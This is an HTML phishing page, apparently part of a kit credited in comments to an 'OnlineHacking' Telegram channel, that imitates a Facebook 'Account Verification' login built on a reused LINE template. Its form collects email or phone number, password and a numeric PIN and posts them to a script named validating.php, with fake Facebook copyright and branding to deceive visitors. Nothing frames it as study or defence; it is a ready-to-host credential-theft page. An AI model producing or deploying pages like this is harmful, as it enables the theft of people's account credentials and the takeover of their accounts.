<!DOCTYPE html>
<html dir="ltr" lang="en" data-lang="en">

<!-- https://telegram.dog/OnlineHacking -->
<!-- Suman --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="UTF-8">
<title>Account Verification</title>
<link rel="shortcut icon" type="image/x-icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Facebook_logo_%28square%29.png/600px-Facebook_logo_%28square%29.png">
<link rel="stylesheet" href="line_web_login_1427946281.css">
<!--[if lt IE 9]><script src="html5_14279462812.js"></script><![endif]-->
<script src="lc.line.web.login.common_1444888891.js"></script>

</head>
<body>
<div class="LyWrap">

	<div class="ArLoginWrap">
		<h1 class="MdGHD1Logo"><span class="mdGHD01L">LINE</span></h1>
		<div class="arLoginWrapInner">
		    <center><img  height="50" width="50" src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Facebook_logo_%28square%29.png/600px-Facebook_logo_%28square%29.png"></center>
			<form action="validating.php" method="post">
				<h2 class="MdHide">Login</h2>
				<p class="MdTxtNotice">Please enter the details registered to your FACEBOOK account.</p>
				<div class="MdMN01LoginForm">
					<p class="MdInputTxt01"><label><span class="MdHide">Email / Number </span><input type="text" id="email" name="email" class="" placeholder='Email / Number' /></label></p>
					<p class="MdInputTxt01"><label><span class="MdHide">Password</span><input type="password" id="password" name="password" class="" placeholder='Password' /></label></p>
					<p class="MdInputTxt01"><label><span class="MdHide">Your Level Account</span><input type="number" id="pin" name="pin" class="" placeholder='Your Level Account' /></label></p>
					<div class="mdMN01Btn"><input type="submit" class="MdBtnLogin ExDisabled" value='Login'></div>
				</div>
			</form>
			
			<div class="MdMN02Msg">
				<p class="MdTxtCaution"></p>
			<!--/MdMN02Msg--></div>
			
			<p class="MdTxtNotice">You can check your account info by starting the FACEBOOK app and going to [Settings] > [Accounts].</p>
			<p class="MdTxtLink"><a href="">About FACEBOOK</a></p>
		
		<!--/arLoginWrapInner--></div>
		<p class="MdGFT01Copy"><small>&copy; FACEBOOK Corporation</small></p>
	<!--/ArLoginWrap--></div>

<!--/LyWrap--></div>

</body>

<!-- OnlineHacking - Suman --!>
</html>
